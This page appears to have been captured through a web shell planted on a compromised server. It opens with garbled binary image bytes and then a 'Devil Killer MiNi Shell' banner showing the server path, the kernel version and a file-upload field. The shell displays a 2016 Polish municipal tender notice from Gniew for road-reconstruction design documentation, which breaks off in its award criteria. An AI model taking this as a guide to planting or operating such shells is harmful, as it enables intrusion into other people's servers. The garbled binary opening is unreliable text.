JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160429/108466-N-2016.html

<p class="kh_header"><b>Gniew: Opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej dla 3 zadań inwestycyjnych przebudowy dróg gminnych :
Zadanie 1. Przebudowa i remont drogi - ul. Partyzantów w Gniewie,
Zadanie 2. Przebudowa drogi gminnej wewnętrznej - ul. Kapinosa w Gniewie,
Zadanie 3. Przebudowa drogi gminnej wewnętrznej - Osiele Leśne w Tymawie</b><br>
<b>Numer ogłoszenia: 108466 - 2016; data zamieszczenia: 29.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy w Gniewie , Pl. Grunwaldzki 1, 83-140 Gniew, woj. pomorskie, tel. 058 5352255 w. 14, 39, faks 058 5352258 w. 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gniew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej dla 3 zadań inwestycyjnych przebudowy dróg gminnych :
Zadanie 1. Przebudowa i remont drogi - ul. Partyzantów w Gniewie,
Zadanie 2. Przebudowa drogi gminnej wewnętrznej - ul. Kapinosa w Gniewie,
Zadanie 3. Przebudowa drogi gminnej wewnętrznej - Osiele Leśne w Tymawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zadanie nr 1. Przedmiotem zamówienia jest opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej dla zadania: Przebudowa ulicy Partyzantów: 
Podstawa opracowania, zakres, dane ogólne.
Należy zaprojektować przebudowę i remont ulicy Partyzantów w zakresie przebudowy chodnika, jezdni, systemu odwodnienia, zieleni, oświetlenia, małej architektury, zlokalizowanej pomiędzy ulicą 27 Stycznia (droga powiatowa), a ulicą Kusocińskiego (droga gminna). Zakres projektowanej inwestycji obejmuje działki: nr 20/1 (arkusz mapy 7) oraz działkę 35/3 (arkusz mapy 9) w Gniewie i stanowi teren zabudowy mieszkaniowej wielorodzinnej i jednorodzinnej bliźniaczej.  Ulica Partyzantów jest drogą klasy D - dojazdowa. Długość pasa drogowego około 270 m, chodników około 350m.
Teren objęty jest MPZP, którego wypis i wyrys stanowi załącznik nr  8 do SIWZ.
Zamawiający nie posiada mapy do celów projektowych.
Opis stanu istniejącego.
 W stanie istniejącym droga gminna, na projektowanym odcinku, posiada przekroj poprzeczny jedniojezdniowy, dwupasmowy o zmiennej szerokości. Chodniki po obu stronach drogi również o zmiennej szerokości, spełniają funkcje związaną z ruchem pieszym. W obecnym stanie technicznym droga gminna nie spełnia swego przeznaczenia pod względem bezpieczeństwa ruchu kołowego  i pieszego. Główne niebezpieczeństwo to zły stan nawierzchni jezdni.  Przy zabudowie bliźniaczej - trylinka z ubytkami; przy zabudowie wielorodzinnej- nawierzchnia bitumiczna, spękana i zdeformowana,  o widocznych śladach napraw cząstkowych. Stan techniczny istniejących chodników zły, popękane płyty chodnikowe z ubytkami.
Odwodnienie drogi zrealizowane poprzez spadki podłużne i poprzeczne jezdni. Wody opadowe na przedmiotowym odcinku drogi są odprowadzane do kanalizacji deszczowej. Aktualnie, w czasie opadów, następuje niekontrolowany spływ powierzchniowy ścieków opadowych, czego przyczyną są zastoiska wody. Warunki gruntowo - wodne na projektowanym odcinku są dobre, nie stwierdzono występowania wód gruntowych.
Rozwiązania projektowe. W dokumentacji należy przewidzieć opracowanie rozwiązań projektowych z uwzględnieniem następujących parametrów:
Na odcinku zabudowy bliźniaczej (od nr 1 - 4) zaprojektować przebudowę chodników, po obydwu stronach, o szerokości spełniającej wymogi ruchu pieszego - 2,00m, uwzględniającymi zatoczkami postojowe o normatywnych wymiarach. Taka sama sama sytuacja przy budynku wielorodzinnym nr 10.
Maksymalne pochylenie podłużne projektowanego chodnika powinno wynosić 6%, pochylenie poprzeczne 2%,
Chodnik obramować: od strony jezdni krawężnikiem betonowym 20x30 cm na ławie betonowej z oporem, od strony zabudowań betonowym obrzeżem,
Nawierzchnię chodników i drogi  zaprojektować  z kostki betonowej szarej i kolorowej
gr. 8cm, a konstrukcję podbudowy dostosować do warunków gruntowo-wodnych;
Wody opadowe z  jezdni i chodnika odprowadzić za pośrednictwem wpustów i studzienek 
do istniejącej kanalizacji deszczowej, w uzgodnieniu z Zakładem Wodociagów i Kanalizacji spółka INWEST-KOM w Gniewie.
Zaplanować wycinkę, kolidującego z inwestycją, istniejącego drzewostanu z zaplanowanymi nasadzeniami. 
Nachylenia terenu przy budynkach wielorodzinnych nr 11 i 11A zabezpieczyć odpowiednią zielenią lub płytami betonowymi ażurowymi.
W razie konieczności przewidzieć likwidację lub przełożenie oświetlenia drogowego.
Zadanie nr 2 Przedmiotem zamówienia jest opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej dla zadania: Przebudowa ulicy Kapinosa w Gniewie: 

Podstawa opracowania, zakres, dane ogólne.
Zakres projektowanej inwestycji obejmuje działki nr 31, 32, 33, 43/29, 43/30, 43/31, 43/32, 43/33, 43/34, arkusz mapy 17, obręb 0019 miasto Gniew, zlokalizowanej, pomiędzy ul. Gdańskiej (droga powiatowa), a  ul. Hallera (droga gminna),  zgodnie z zakresem, oznaczonym na mapie kolorem zielonym,  stanowiącej załącznik nr 9 do SIWZ i stanowi teren zabudowy jednorodzinnej. Ulica Kapinosa oznaczona jest w MPZP symbolem KDW I KDD, którego wypis i wyrys stanowi załącznik nr 9 do SIWZ. Długość projektowanej drogi wynosi ok. 850 m.
Zamawiający nie posiada mapy do celów projektowych.
Opis stanu istniejącego.
W stanie istniejącym droga gminna, na projektowanym odcinku posiada nawierzchnię gruntową, utwardzoną kamieniem łamanym. Na odcinku, oznaczonym w MPZP symbolem KDW, jest istniejący chodnik, nie spełniający obowiązujących norm. Teren jest uzbrojony w sieć wodociagową 
i kanalizacyjną oraz szczątkową kanalizację deszczową.
Rozwiązania projektowe.
Inwestycja nie będzie wykraczała poza obszar pasa drogowego. Nawierzchnię jezdni oraz chodników zaprojektować z kostki brukowej (na jezdni oraz wjazdach na posesje kostka gr. 8 cm, na chodnikach gr. 6 cm, a konstrukcję podbudowy dostosować do warunków gruntowo-wodnych).
Rodzaj i kolor kostki brukowej, elementy infrastruktury (włazy studni, kratki ściekowe, elementy BRD itp.), typ oznakowania pionowego i poziomego oraz inne szczegóły należy uzgadniać z zamawiającym na etapie projektowym. Należy zapewnić odpowiednie odwodnienie pasa drogowego. Istniejące 
w jezdni włazy kanalizacji osadzić w prefabrykowanych elementach betonowych. Zapewnić lokalizację elementów wyposażenia dróg (np. znaków drogowych, słupów oświetleniowych),  w miarę możliwości poza ciągami komunikacyjnymi, tak aby zachować wymagane przepisami skrajnie.
Należy zapewnić oświetlenie drogi zgodnie z paragrafem 109 ww. Rozporządzenia w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne.
Zadanie nr 3. Przedmiotem zamówienia jest opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej dla zadania: Przebudowa drogi wewnętrznej - Osiedle Leśne w Tymawie: 

Podstawa opracowania, zakres, dane ogólne.
Zakres projektowane inwestycji obejmuje działki nr 18/13; 298/1; 298/2; 312; 325; 339; 349; 367, arkusz mapy 1, obręb 0007 Tymawa, zlokalizowanym przy drodze powiatowej nr  2823 G Nicponia -Jaźwiska - Opalenie, zgodnie z zakresem oznaczonym kolorem żółtym na mapie stanowiącej załącznik nr 10 do SIWZ i stanowi teren zabudowy jednorodzinnej.  Droga dojazdowa oznaczona jest w MPZP symbolem KDW I KDX, którego wypis i wyrys stanowi załącznik nr 10 do SIWZ. Długość projektowanych dróg wynosi ok. 1515 m.
Zamawiający posiada mapę do celów projektowych w wersji papierowej i elektronicznej.
Opis stanu istniejącego.
W stanie istniejącym droga gminna, na projektowanym odcinku posiada nawierzchnię gruntową, utwardzoną kamieniem łamanym. Teren jest uzbrojony w sieć wodociagową i kanalizacyjną oraz  kanalizację deszczową. 

Rozwiązania projektowe.
Inwestycja nie będzie wykraczała poza obszar pasa drogowego.Nawierzchnię jezdni oraz chodników zaprojektować z kostki brukowej (na jezdni oraz wjazdach na posesje kostka gr. 8 cm, na chodnikach gr. 6 cm, a konstrukcję podbudowy dostosować do warunków gruntowo-wodnych).
Rodzaj i kolor kostki brukowej, elementy infrastruktury (włazy studni, kratki ściekowe, elementy BRD itp.), typ oznakowania pionowego i poziomego oraz inne szczegóły należy uzgadniać z zamawiającym na etapie projektowym.
W projekcie należy zastosować elementy poprawiające bezpieczeństwo i uspokajające ruch, typu azyle na przejściach dla pieszych, wysepki korygujące tor ruchu pojazdów w celu wymuszenia zmniejszenia prędkości lub innych elementów zaproponowanych przez Projektanta 
i zaakceptowanych przez Zamawiającego.
Wody opadowe z jezdni i chodników odprowadzić za posrednictwem wpustow i studzienek 
do istniejącej kanalizacji deszczowej. 
Istniejace w jezdni włazy kanalizacji osadzić w prefabrykowanych elementach betonowych.
Zapewnić lokalizację elementów wyposażenia dróg (np. znaków drogowych, słupów oświetleniowych) w miarę możliwości poza ciągami komunikacyjnymi, tak aby zachować wymagane przepisami skrajnie.
Należy zapewnić wymianę słupów i opraw oświetleniowych. 

Ogólne zasady wykonania przedmiotu zamówienia  obejmują: 

Przedmiotem zamówienia jest opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej oraz uzyskanie, w imieniu zamawiającego, decyzji o pozwoleniu na budowę,zgłoszenia, decyzji ZRID (jeżeli wystąpi taka konieczność). 
Zamawiający udzieli wykonawcy pisemnego pełnomocnictwa w celu uzyskania pozwolenia na budowę. 
Wytyczne techniczne do projektowania zgodnie z obowiązującymi przepisami prawa (zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego,  (tj. z dnia 10 maja 2013 r. (Dz.U. z 2013 r. poz. 1129) ,oraz z rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (tj. z dnia 23 grudnia 2015 r. (Dz.U. z 2016 r. poz. 124) 
Wykonawca będzie zobowiązany do uzyskania zgód właścicieli nieruchomości do celów projektowych. 
Należy wykonać projekty przebudowy infrastruktury kolidującej z inwestycją oraz projekty przebudowy (przełożenia) ewentualnych kolizji istniejącego uzbrojenia, wraz z uzyskaniem warunków technicznych przebudowy urządzeń przez właściwych zarządców sieci jako oddzielnego opracowania.
Badania geologiczne powinny być wykonane w niezbędnym zakresie oraz mają stanowić część niniejszego przedmiotu zamówienia, jako podstawę do zaprojektowania właściwej konstrukcji drogi, jezdni, ciagu pieszego.
Po podpisaniu umowy, Wykonawca wraz z przedstawicielem Zamawiającego i Zarządcy drogi, odbędą wizję w terenie, celem precyzyjnego określenia początku i końca zakresu projektowego.
Zadaniem Wykonawcy będzie pozyskanie wszelkich, niezbędnych dokumentów w celu kompleksowej realizacji przedmiotu zamówienia.
9Wykonawca jest bezwzględnie zobowiązany do wykonania koncepcji projektów drogowych
 i przeprowadzenia, co najmniej jednej, konsultacji z Zamawiającym i mieszkańcami  osiedli. Jeżeli zaistnieje taka potrzeba, konsultacje będą odbywać się stosownie do potrzeb. Ze spotkań zostanie sporządzony odpowiedni protokół.
Zamawiający zastrzega, by informacje zawarte w dokumentacji w zakresie technologii wykonania robót, doboru materiałów i urządzeń określały przedmiot zamówienia w sposób zgodny z ustawą Prawo zamówień publicznych, tzn. bez używania nazw własnych, a jedynie poprzez określenie parametrów precyzujących rodzaj, standard oraz inne istotne elementy. 

UWAGA: 
W przypadku, gdy na etapie realizacji zamówienia Wykonawca uzna, że którekolwiek z wymagań Zamawiającego jest nieprawidłowe z punktu widzenia obowiązujących przepisów lub nieuzasadnione z innych przyczyn, winien niezwłocznie zgłosić ten fakt Zamawiającemu. 
W opisanym przypadku Wykonawca będzie zobowiązany do udowodnienia Zamawiającemu konieczności wprowadzenia zmian w stosunku do wymogów określonych przez Zamawiającego. Powstałe w konsekwencji ewentualne zmiany we wskazanym zakresie, nie będą stanowić podstawy do zwiększenia wynagrodzenia Wykonawcy za wykonanie przedmiotu zamówienia.
2.W ramach przedmiotu zamówienia Wykonawca jest zobowiązany do wykonania:
Wykonawca pozyska swoim staraniem dane o stanie ewidencyjnym, w tym mapy ewidencyjne oraz wypisy z rejestru gruntów,
Projektant, własnym staraniem pozyska mapy do celów projektowych lub w przypadku zadania nr 3, dokona aktualizacji mapy lub wykona uzupełniający pomiar wysokościowy,
koncepcję przebiegu chodnika zaakceptowaną przez Zamawiającego,
Uzyskaną w imieniu Zamawiającego decyzję o środowiskowych uwarunkowaniach dla przedsięwzięcia  publicznego, ewentualnie sporządzenie raportu oddziaływania na środowisko (jeżeli wystąpi taka potrzeba),
Operat wodno-prawny wraz z uzyskaniem pozwolenia (jeżeli wystąpi taka potrzeba),
Projekt podziału nieruchomości - w przypadku takiej konieczności,
Projekt budowlano-wykonawczy projektowanych dróg- 6 egz.
Projekt budowlano-wykonawczy innych urządzeń wraz z zasilaniem energetycznym i włączenia go do istniejącego systemu (jeżeli wystąpi taka potrzeba),  -6 egz.
Wszelkie wymagane uzgodnienia projektowe (w tym uzyskanie warunków technicznych przyłączenia  do sieci elektroenergetycznych) i inne niezbędne opinie,
Badania geologiczno - inżynierskie oraz ustalenie warunków geotechnicznych
Projekt tymczasowej organizacji ruchu - wytyczne dla wykonawcy robót - 5 egz.
Projekt przebudowy lub zabezpieczenia kolidującej infrastruktury technicznej (w miarę wystąpienia takiej potrzeby) - 3 egz.
Dokumentacja dendrologiczna (wycinki drzew i krzewów, jeżeli wystąpi taka potrzeba) - 2 egz.
Specyfikację techniczną wykonania i odbioru robot dla każdej branży - 2 egz.
Przedmiary robót - 2 egz.
Kosztorys inwestorski - 2 egz. orazzbiorcze zestawienie kosztów - 2 egz.
Wersję elektroniczną dokumentacji  na płycie DVD   - 1 egz.
Uzyskanie, w imieniu zamawiającego, decyzji o pozwoleniu na budowę, zgłoszenia, lub złoży wniosek o wydanie decyzji ZRID, jeżeli wystąpi taka potrzeba
3. Dokumentacja stanowiąca przedmiot odbioru powinna być zaopatrzona w następujące załączniki:
Wykaz opracowań,
Pisemne oświadczenie Wykonawcy i sprawdzającego, że dokumentacja jest wykonana zgodnie z umową, obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej (art. 20 ust. 4 Prawa budowlanego),
Pisemne oświadczenie Wykonawcy, że dokumentacja zostaje wydana w stanie  zupełnym,  kompletnym dla celu, któremu ma służyć,
Załączniki ww. stanowią integralną część dokumentacji projektowej.
4.Zamawiający zastrzega, by informacje zawarte w dokumentacji w zakresie technologii wykonania robót, doboru materiałów i urządzeń określały przedmiot zamówienia w sposób zgodny z ustawą Prawo zamówień publicznych, tzn. bez używania nazw własnych, a jedynie poprzez określenie parametrów precyzujących rodzaj, standard oraz inne istotne elementy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia Wykonawcy zamówień uzupełniających w wysokości do 20 % wartości zamówienia podstawowego polegające na powtórzeniu tego samego rodzaju zamówień, zgodnego z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeśli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - w tym okresie wykonał co najmniej 2 usługi polegającą na projektowaniu obiektów drogowych o długości minimum 500 m w zakresie odpowiadającym przedmiotowi zamówienia. Wykonawca nie może sumować kilku usług o mniejszym zakresie dla uzyskania wymaganych wartości porównywalnych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeśli wykonawca wykaże, że dysponuje 
co najmniej: 
-jedną osobą posiadającą uprawnienia projektowe w specjalności drogowej bez ograniczeń, 5 letnie doświadczenie zawodowe oraz wpisaną na listę członków właściwej izby samorządu zawodowego, potwierdzonym zaświadczeniem wydanym przez tę izbę, z określonym w nim terminem ważności; 
-jedną osobę posiadającą uprawnienia projektowe w specjalności sanitarnej bez ograniczeń, 3 letnie doświadczenie zawodowe oraz wpisaną na listę członków właściwej izby samorządu zawodowego, potwierdzonym zaświadczeniem wydanym przez tę izbę, z określonym nim terminem ważności;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ramach tego warunku wykonawca zobowiązany jest do:
Wykazania, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Minimalna kwota ubezpieczenia to 100.000,00 złotych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
